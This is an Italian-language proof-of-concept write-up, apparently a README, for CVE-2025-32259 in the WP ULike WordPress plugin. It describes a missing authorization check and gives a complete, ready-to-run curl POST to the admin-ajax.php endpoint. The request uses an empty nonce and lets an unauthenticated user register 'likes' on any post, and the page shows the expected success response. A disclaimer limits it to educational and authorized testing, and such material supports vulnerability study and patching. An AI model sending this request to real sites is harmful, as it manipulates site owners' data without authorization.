
Nelle versioni interessate del plugin WP ULike, non è presente un controllo di autorizzazione adeguato prima di consentire determinate azioni AJAX o manipolazioni dei voti. Ciò consente a utenti non autenticati di interagire con il plugin in modi che dovrebbero essere consentiti solo agli utenti che hanno effettuato l'accesso, con il rischio di alterare i voti o di iniettare dati fuorvianti.
🔬 Una semplice PoC che dimostra CVE-2025-32259 nel plugin WP ULike per WordPress.
🚨 Solo uso educativo – non testare su sistemi senza autorizzazione esplicita.
WP ULike è un popolare plugin WordPress che consente agli utenti di mettere "mi piace" ai contenuti di un sito. Le versioni fino alla 4.7.9.1 presentano una vulnerabilità di autorizzazione mancante, che consente a utenti non autenticati di falsificare le azioni "mi piace" tramite richieste AJAX.
La vulnerabilità consente a utenti non autenticati di interagire con l'endpoint AJAX e mettere "mi piace" a qualsiasi contenuto (post, commento, ecc.) senza permesso.
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
Sostituisci id=1 con un ID di post valido.
Una risposta di successo potrebbe essere simile a:
{"status":"success","msg":"You liked this."}